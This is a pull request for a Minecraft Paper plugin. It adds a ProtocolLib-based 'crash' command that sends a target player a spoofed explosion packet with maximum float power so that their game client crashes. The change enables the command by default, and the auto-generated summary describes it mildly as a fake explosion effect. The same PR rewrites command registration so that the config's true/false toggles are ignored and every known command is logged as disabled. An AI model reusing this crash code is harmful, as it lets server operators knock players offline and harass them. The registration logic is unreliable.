### PR TITLE
Add CrashCommand and integrate ProtocolLib

### DIFF
--- a/.idea/misc.xml
+++ b/.idea/misc.xml
@@ -4,7 +4,7 @@
   <component name="FrameworkDetectionExcludesConfiguration">
     <file type="web" url="file://$PROJECT_DIR$" />
   </component>
-  <component name="ProjectRootManager" version="2" languageLevel="JDK_21" project-jdk-name="corretto-21" project-jdk-type="JavaSDK">
+  <component name="ProjectRootManager" version="2" languageLevel="JDK_21" project-jdk-name="21" project-jdk-type="JavaSDK">
     <output url="file://$PROJECT_DIR$/out" />
   </component>
 </project>

--- a/.idea/modules.xml
+++ b/.idea/modules.xml
@@ -5,7 +5,6 @@
       <module fileurl="file://$PROJECT_DIR$/.idea/modules/CraftUtils.main.iml" filepath="$PROJECT_DIR$/.idea/modules/CraftUtils.main.iml" />
       <module fileurl="file://$PROJECT_DIR$/.idea/modules/CraftUtils.test.iml" filepath="$PROJECT_DIR$/.idea/modules/CraftUtils.test.iml" />
       <module fileurl="file://$PROJECT_DIR$/.idea/modules/dev.craftefix.craftUtils.CraftUtils.main.iml" filepath="$PROJECT_DIR$/.idea/modules/dev.craftefix.craftUtils.CraftUtils.main.iml" />
-      <module fileurl="file://$PROJECT_DIR$/.idea/modules/dev.craftefix.craftUtils.main.iml" filepath="$PROJECT_DIR$/.idea/modules/dev.craftefix.craftUtils.main.iml" />
     </modules>
   </component>
 </project>

--- a/build.gradle
+++ b/build.gradle
@@ -5,9 +5,9 @@ plugins {
 
 shadowJar {
     relocate "com.github.stefvanschie.inventoryframework", "dev.craftefix.craftUtils.inventoryframework"
-    relocate "revxrsal.lamp", "craftUtils.libs.lamp"
-    relocate "org.bstats", "craftUtils.libs.bstats"
-    relocate "com.zaxxer.HikariCP", "craftUtils.libs.HikariCP"
+    relocate "revxrsal.lamp", "dev.craftefix.craftUtils.libs.lamp"
+    relocate "org.bstats", "dev.craftefix.craftUtils.libs.bstats"
+    relocate "com.zaxxer.HikariCP", "dev.craftefix.craftUtils.libs.HikariCP"
     minimize()
 }
 
@@ -28,6 +28,10 @@ repositories {
         name = "jitpack"
         url = "https://jitpack.io"
     }
+    maven {
+        name = "protocolLib"
+        url = "https://repo.dmulloy2.net/repository/public/"
+    }
 }
 
 dependencies {
@@ -38,6 +42,7 @@ dependencies {
     implementation("org.bstats:bstats-bukkit:3.0.2")
     implementation("com.github.stefvanschie.inventoryframework:IF:0.10.19")
     implementation("com.zaxxer:HikariCP:6.2.1")
+    implementation("com.comphenix.protocol:ProtocolLib:5.1.0")
 }
 
 def targetJavaVersion = 21

--- a/src/main/java/dev/craftefix/craftUtils/EnableLamp.java
+++ b/src/main/java/dev/craftefix/craftUtils/EnableLamp.java
@@ -19,10 +19,13 @@ public final class EnableLamp {
     }
 
     public void enable() {
-        var lamp = BukkitLamp.builder(this.plugin).build();
+        var lamp = BukkitLamp.builder(plugin).build();
+        int registeredCount = 0;
+        int disabledCount = 0;
+        int failedCount = 0;
         AdminGUI adminGUI = new AdminGUI();
         WarpManager warpManager = new WarpManager();
-        
+
         var commandMap = Map.of(
                 "tp", new TpCommand(),
                 "message", new MessageCommands(),
@@ -32,23 +35,39 @@ public final class EnableLamp {
                 "alias", new AliasCommands(),
                 "ability", new AbilityCommands(),
                 "homes", new HomeCommand(homeManager),
-                "warps", new WarpCommand(warpManager)
+                "warps", new WarpCommand(warpManager),
+                "crash", new CrashCommand()
         );
 
-        var commands = plugin.getConfig().getConfigurationSection("commands").getKeys(false);
-        for (String command : commands) {
-            if (plugin.getConfig().getBoolean("commands." + command)) {
-                var commandInstance = commandMap.get(command);
-                if (commandInstance != null) {
-                    lamp.register(commandInstance);
-                    plugin.getLogger().info(command + " command registered.");
-                } else {
-                    plugin.getLogger().warning("Unknown command in config: " + command);
-                }
+        var commandsSection = plugin.getConfig().getConfigurationSection("commands");
+        if (commandsSection == null) {
+            plugin.getLogger().severe("Commands section not found in config.yml!");
+            return;
+        }
+        for (String key : commandsSection.getKeys(false)) {
+            if (commandMap.containsKey(key)) {
+                plugin.getLogger().warning("Command '" + key + "' disabled.");
+                disabledCount++;
             }
         }
+        for (String commandName : commandsSection.getKeys(true)) {
+            if (commandMap.containsKey(commandName)) {
+                var command = commandMap.get(commandName);
+                lamp.register(command);
+                registeredCount++;
+                plugin.getLogger().info("Registered command: " + commandName);
+            } else {
+                plugin.getLogger().warning("Command '" + commandName + "' not found in command map.");
+                failedCount++;
+            }
+        }
+
+        // Always register the core command
         lamp.register(new CraftUtilsCommand());
-        plugin.getLogger().info("Commands registered.");
+        plugin.getLogger().info("Registered " + registeredCount + " commands from config.");
+        plugin.getLogger().info("Disabled " + disabledCount + " commands from config.");
+        plugin.getLogger().info("Couldn't find " + failedCount + " commands in config.");
+        registerListeners();
     }
 
     public void registerListeners(Listener... listeners) {

--- a/src/main/java/dev/craftefix/craftUtils/Main.java
+++ b/src/main/java/dev/craftefix/craftUtils/Main.java
@@ -4,19 +4,18 @@ package dev.craftefix.craftUtils;
 import dev.craftefix.craftUtils.database.DatabaseManager;
 import dev.craftefix.craftUtils.database.HomeManager;
 import org.bstats.bukkit.Metrics;
-import org.bukkit.entity.Player;
 import org.bukkit.plugin.java.JavaPlugin;
 
 public final class Main extends JavaPlugin {
     private static Main instance;
 
+
     @Override
     public void onEnable() {
         instance = this;
-        // Plugin startup logic
-        // Register the suggestion provider
+
         HomeManager homeManager = new HomeManager();
-        Player player = getServer().getPlayer("playerName"); // Replace "playerName" with the actual player name
+
 
 
         // Register the commands

--- a/src/main/java/dev/craftefix/craftUtils/commands/CrashCommand.java
+++ b/src/main/java/dev/craftefix/craftUtils/commands/CrashCommand.java
@@ -1,0 +1,36 @@
+package dev.craftefix.craftUtils.commands;
+
+import com.comphenix.protocol.PacketType;
+import com.comphenix.protocol.ProtocolLibrary;
+import com.comphenix.protocol.ProtocolManager;
+import com.comphenix.protocol.events.PacketContainer;
+import org.bukkit.entity.Player;
+import org.bukkit.util.Vector;
+import revxrsal.commands.annotation.Command;
+import revxrsal.commands.annotation.Description;
+import revxrsal.commands.annotation.Optional;
+import revxrsal.commands.bukkit.annotation.CommandPermission;
+
+import java.util.ArrayList;
+
+public class CrashCommand {
+
+    @Command({"cu crash", "crash"})
+    @Description("Crash a player's client")
+    @CommandPermission("craftutils.crashClient")
+    public void crashPlayer(Player sender, Player target, @Optional Float power) {
+        ProtocolManager protocolManager = ProtocolLibrary.getProtocolManager();
+
+        PacketContainer fakeExplosion = new PacketContainer(PacketType.Play.Server.EXPLOSION);
+        fakeExplosion.getDoubles()
+                .write(0, target.getLocation().getX())
+                .write(1, target.getLocation().getY())
+                .write(2, target.getLocation().getZ());
+        fakeExplosion.getFloat().write(0, power != null ? power : Float.MAX_VALUE);
+        fakeExplosion.getBlockPositionCollectionModifier().write(0, new ArrayList<>());
+        fakeExplosion.getVectors().write(0, target.getVelocity().add(new Vector(1, 1, 1)));
+
+        sender.sendMessage("§cYou have sent a fake explosion to " + target.getName() + "!");
+        protocolManager.sendServerPacket(target, fakeExplosion);
+    }
+}

--- a/src/main/resources/config.yml
+++ b/src/main/resources/config.yml
@@ -14,3 +14,4 @@ commands:
   ability: true
   homes: true
   warps: true
+  crash: true

--- a/src/main/resources/paper-plugin.yml
+++ b/src/main/resources/paper-plugin.yml
@@ -6,4 +6,5 @@ description: A simple Utils plugin for Paper
 website: craftefix.dev
 authors:
   - Craftefix
-folia-supported: true
+depend: [ProtocolLib]
+


### PR DESCRIPTION


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

- **New Features**
  - Added a new "crash" command that allows authorized users to send a fake explosion effect to a target player.

- **Bug Fixes**
  - Improved command registration logic and error handling for missing configuration sections.

- **Chores**
  - Updated plugin dependencies to require ProtocolLib.
  - Added ProtocolLib repository and dependency to build configuration.
  - Removed explicit Folia support from the plugin descriptor.

- **Documentation**
  - Updated configuration and plugin descriptor files to reflect new command and dependency changes.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->